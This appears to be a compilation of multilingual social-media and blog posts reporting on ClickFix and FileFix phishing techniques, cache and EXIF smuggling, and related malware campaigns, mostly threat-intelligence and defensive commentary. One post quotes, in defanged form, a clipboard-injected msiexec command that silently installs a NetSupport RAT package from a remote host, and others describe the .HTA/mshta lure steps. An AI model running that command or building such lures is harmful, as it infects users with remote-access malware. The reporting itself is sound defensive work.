#blue_team #malware #payload #browser #image #steganography #exif #clickfix #filefix #cahche_smuggling

Использовать Exif для скрытия данных — не новая идея. Но раньше это делали в сценариях, где само вредоносное ПО скачивает картинку и достает из неё payload. Добавляем Cache Smuggling и любой софт, кэширующий изображения и не удаляющий Exif - пассивный канал доставки второго этапа, без сетевой активности со стороны вредоноса.

А это - загрузчики, которым не нужно связаться с командным сервером (C2-less loaders). Загрузчик может не выполнять веб-запросы, а просто мониторить локальный кэш в поисках файлов, содержащих заранее определенные сигнатуры.

Отсюда вытекает главный вывод для безопасников: нельзя полагаться на предпосылку «если скрипт не делает сетевых запросов, значит, он не получил payload». Если второй этап уже «доставлен» в систему через кэширование, любые меры безопасности, ограничивающие способность скрипта делать веб-запросы, окажутся неэффективными.

[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов

Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.

https://habr.com/ru/companies/bastion/articles/967312/?utm_source=habrahabr&utm_medium=rss&utm_campaign=967312

#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия

[Перевод] В кэше — фотка, в ней payload: новый метод скрытой доставки зловредов

Недавно в ходе рутинной разведки угроз я наткнулся на необычную фишинговую страницу, которая комбинирует социальную инженерию и коварный payload под видом обычной JPEG-картинки, убеждая пользователя самостоятельно выполнить вредоносный код. В типичных сценариях злоумышленники пытаются заставить жертву скачать исполняемый файл из сети — но тут всё хитрее. Страница прячет в кэше браузера вредоносный файл, замаскированный под изображение, а затем просит жертву выполнить «безобидную» команду, которая извлекает payload из кэша. В результате получаем локальный запуск кода, который не фиксируется средствами сетевого мониторинга. По сути, атака умело сочетает две техники: принуждение к локальному исполнению (ClickFix/FileFix) и контрабанду кэша (Cache Smuggling). В статье я подробно разберу каждый из этих приемов и покажу, как можно сделать доставку полезной нагрузки еще более незаметной.

https://habr.com/ru/companies/bastion/articles/967312/

#exif_smuggling #cache_smuggling #контрабанда_exif #filefix #clickfix #фишинг #контрабанда_кэша #безопасность_браузеров #информационная_безопасность #социальная_инженерия

⚠️ #ClickFix malware tricks users into infecting themselves, bypassing traditional security. In 2025, it became #2 vector after #phishing.

See how @atEricParker dissected ClickFix attacks including the new #FileFix variant 👇
https://any.run/cybersecurity-blog/click-fix-attacks-eric-parker-analysis/?utm_source=mastodon&utm_medium=post&utm_campaign=clickfix-attacks&utm_content=linktoblog&utm_term=121125

#cybersecurity #infosec

One sneaky HTTP header is all it takes—attackers are using FileFix to smuggle malware past top security defenses. How vulnerable is your cache?

https://thedefendopsdiaries.com/cache-smuggling-how-the-filefix-attack-outsmarts-security-defenses/

#cache-smuggling
#filefix-attack
#web-security
#cybersecurity-threats
#http-headers

FileFix – atak phishingowy wykorzystujący Eksplorator Systemu Windows

Badacze bezpieczeństwa z Acronis Threat Research Unit zaobserwowali nową kampanię phishingową wykorzystującą metodę ataku FileFix. Atak wyróżnia się nietypowym sposobem ukrywania złośliwego oprogramowania – zastosowanie obfuskacji oraz steganografii. FileFix stanowi nowy wariant popularnego wektora ataku ClickFix. Podobnie jak w przypadku tego wektora, celem ataku jest nakłonienie użytkownika do samodzielnego uruchomienia...

#WBiegu #Clickfix #Filefix #Meta #Phishing #Stealc

https://sekurak.pl/filefix-atak-phishingowy-wykorzystujacy-eksplorator-systemu-windows/

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

The Register: FileFix attacks use fake Facebook security alerts to trick victims into running infostealers. “An attack called FileFix is masquerading as a Facebook security alert before ultimately dropping the widely used StealC infostealer and malware downloader on Windows machines.”

https://rbfirehose.com/2025/09/20/the-register-filefix-attacks-use-fake-facebook-security-alerts-to-trick-victims-into-running-infostealers/

Watch out as hackers are using FileFix phishing with fake Facebook warnings to drop StealC Infostealer, hiding the payload inside images with #steganography.

Read: https://hackread.com/filefix-attack-stealc-infostealer-fake-facebook-pages/

#CyberSecurity #Phishing #FileFix #StealC #Infostealer

2025-08-20 (Wed): #Kongtuke still using #FileFix style #ClickFix instructions on its fake CAPTCHA pages.

I never got any further than the HTTP POST request that sends information about the infected system host.

Details at: https://github.com/malware-traffic/indicators/blob/main/2025-08-20-IOCs-for-Kongtuke-activity.txt

#red_team #filefix

На странице пользователю будет предложено нажать Ctrl+S (Сохранить как), выбрать «Веб-страница, Завершить» и сохранить файл как MfaBackupCodes2025.hta.

Безусловно, такой алгоритм требует взаимодействия, однако если пользователь не особо продвинут, а вредоносная веб-страница выглядит достаточно прилично - шанс на успех весьма высок.

В качестве одной из мер защиты от этого варианта атаки FileFix можно рассматривать изъятие mshta.exe из среды (располагается в C:\Windows\System32 и C:\Windows\SysWOW64).

Кроме того, целесообразно активировать видимость расширений файлов в Windows и заблокировать HTML-вложения в электронных письмах.

Mrd0X (https://mrd0x.com/filefix-part-2/)

#red_team #filefix

HTML-приложения (.HTA) считаются устаревшей технологией. Тем не менее, этот тип файла Windows может использоваться для выполнения HTML и скриптового контента с использованием легитимного mshta.exe в контексте текущего пользователя.

Исследователь обнаружил, что в случае сохранения HTML-файлов как «Веб-страница, полностью» (с типом MIME text/html), тег MoTW не присваивается, что позволяет выполнять скрипты без предупреждений для пользователя.

Когда жертва открывает файл .HTA, встроенный вредоносный скрипт запускается мгновенно, без какого-либо предупреждения.

Наиболее сложной частью атаки является этап социнженерии, когда жертву нужно обманом заставить сохранить веб-страницу и затем ее переименовать.

Одним из способов решения этой проблемы является разработка более эффективной приманки, например вредоносного веб-сайта, предлагающего пользователям сохранять коды MFA для обеспечения последующего доступа к услуге.

Атака FileFix

#red_team #filefix

Исследователь mr.d0x представил подробности новой атаки FileFix, которая позволяет выполнять вредоносные скрипты, обходя защиту Mark of the Web (MoTW) в Windows, полагаясь на особенности обработки браузерами сохраненных веб-страниц HTML.

На прошлой неделе исследователь продемонстрировал, как изначальный метод FileFix работал в качестве альтернативы атакам ClickFix, обманывая пользователей и заставляя их вставлять замаскированную команду PowerShell в адресную строку Проводника.

Атака включает в себя фишинговую страницу, которая путем обмана жертвы заставить скопировать вредоносную команду PowerShell.

Как только она попадает в Проводник, Windows запускает PowerShell.

С помощью нового варианта атаки (http://mrd0x.com/filefix-part-2/) FileFix злоумышленник использует социальную инженерию, обманом заставляя пользователя сохранить HTML-страницу (используя Ctrl+S) и переименовать её в .HTA, что автоматически запускает встроенный JScript через mshta.exe.

From Check Point Research:

FileFix

Check Point Research uncovered that FileFix, a social engineering method that opens File Explorer from a malicious site and copies a hidden PowerShell command to the clipboard, is actively tested by threat actors. Pasting it into the address bar executes malware without exploiting software flaws.

https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/

#filefix #socialengineering #malicious #malware

🚨 KongTuke FileFix Leads to New Interlock RAT Variant

Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT). This new malware, a shift from the previously identified JavaScript-based Interlock RAT (aka NodeSnake), uses PHP and is being used in a widespread campaign.

🧅 Attack Chain
FileFix lure ➡️ PowerShell ➡️ Obfuscated PHP RAT

🧠 Key Capabilities
🔍 Automated Discovery
‣ Enumerates processes, services, ARP tables, and user context

🛠️ Hands-On-Keyboard Activity
‣ net user, tasklist, nltest, whoami, dir, and more

⚙️ Execution & Persistence
‣ Runs EXE, DLL, and shell commands
‣ Establishes persistence via registry Run key

📖 Full Report:

https://thedfirreport.com/2025/07/14/kongtuke-filefix-leads-to-new-interlock-rat-variant/

#DFIR #ThreatIntel #InterlockRAT #FileFix #CyberSecurity #ThreatHunting #Infosec #IncidentResponse #cyberthreatintelligence #ransomware

@badsamurai That's basically my point. #FileFix is just #ClickFix by another name. Trying to separate the two doesn't make sense to me.

Definitely agree that your mitigation is a good way to help combat this.

Example 2: #FileFix

As of 2025-07-03, the #KongTuke campaign is using FileFix style #ClickFix pages to distribute whatever this campaign is distributing.

It's likely pushing #InterlockRAT based on previous discussions I've had here, but I couldn't confirm, because it didn't like me.

#ClickFix is a social engineering technique that uses fake verification pages and clipboard hijacking to convince people to click and keyboard stroke their way to an infection. So let's categorize #FileFix properly in the pantheon of ClickFix Attacks.

FileFix: A ClickFix page that asks you to past script into a File Manager window.

#RunFix: A ClickFix page that asks you to paste script into a Run window

#TermFix: A ClickFix page that asks you to paste script into a terminal window (cmd.exe console or PowerShell terminal).

We cool with that? Any others types I'm missing?

📢 Découverte de FileFix : une nouvelle méthode d'attaque par navigateur
📝 Cette actualité, publiée par un média spécialisé, met en lumière la découverte d'une nouvelle méthode d'attaque par navig...
📖 cyberveille : https://cyberveille.ch/posts/2025-07-02-decouverte-de-filefix-une-nouvelle-methode-d-attaque-par-navigateur/
🌐 source : https://www.mobile-hacker.com/2025/06/24/introducing-filefix-a-new-alternative-to-clickfix-attacks/
#FileFix #attaque_par_navigateur #Cyberveille

@campuscodi The "#FileFix" technique has an nonsensical name, but the design decision by #Microsoft which makes it possible is absolutely ridiculous. It at least makes sense to let the user run an executable from in the "Run" dialog; letting the user run an executable from the Location bar makes no sense. What conceivable use case did some engineer have in mind? Or did they just re-use an API without thinking?

They implemented a security defect by design, by violating the Principle of Least Astonishment. Microsoft never ceases to amaze.

https://en.wikipedia.org/wiki/Principle_of_least_astonishment

#humanFactor #POLA